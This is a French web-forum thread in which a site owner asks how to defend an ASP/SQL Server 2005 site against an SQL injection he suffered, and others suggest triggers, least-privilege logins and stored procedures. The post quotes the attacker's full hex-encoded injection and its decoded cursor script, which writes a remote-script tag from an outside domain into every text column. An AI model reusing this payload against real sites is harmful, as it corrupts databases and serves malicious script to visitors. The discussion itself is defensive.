Discussion :

[sami_c]

Bonjour,
Mon site ASP/SQL Server 2005 a été sujet d'une attaque XSS via un script qui prend un paramètre de type entier et qui lance une requête du genre
select * from la_table where id = var_id

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
/page.asp 
id=345;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C40432056415243484152283235352 
9204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A656374732 
0612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E787 
47970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524 
F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205 
B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C7363726970742 
07372633D687474703A2F2F7777772E757361626E722E636F6D2F6E67672E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F4 
37572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VAR 
CHAR(4000));EXEC(@S);--

Ce qui est après CAST est du hex qui est en fait :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR
FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR 
b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.usabnr.com/ngg.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Bref le pirate a u inseré le code "<script src=http://www.usabnr.com/ngg.js></script>" dans tt les colonne de type chaine de tt les tables !!

Je voudrais savoir si je peux contrer ce genre d'attaque en modifiant qq chose au niveau de mon serveur de bdd (sql server 2005) et/ou web
merci

[Samath]

J'eu la même chose il y'a qq mois.
pour sauver les meubles en attendant, je te conseille un trigger sur chaque table
de ta base, qui vérifie les données de la table inserted a chaque update , s'il contient la chaine <script>, tu fais un rallback.

[seminoque]

Deux idées simples :

Limiter les accès de l'utilisateur web au strict minimum c'est à dire que le login correspondant doit avoir accès uniquement aux bases de données utilisées pour ton site et surtout pas aux bases systèmes.

Ensuite il vaut mieux mettre le code SQL systématiquement dans des procédures stockées et donner à l'utilisateur le droit d'exécuter celles-ci uniquement. C'est un peu lourd au début mais on s'y habitue.

De cette manière l'utilisateur ne peut pas connaître les tables de la base de données ni le code SQL contenu dans les procédures. Au pire il exécute les procédures stockées

________________________________
Seminoque, créateur de
http://www.bingokaz.com

[SQLpro]

Cette attaque par injection de SQL est connue depuis des mois et des réponses ont été apportées depuis. Relisez les posts à ce sujet !
http://www.developpez.net/forums/sho...highlight=CAST

A +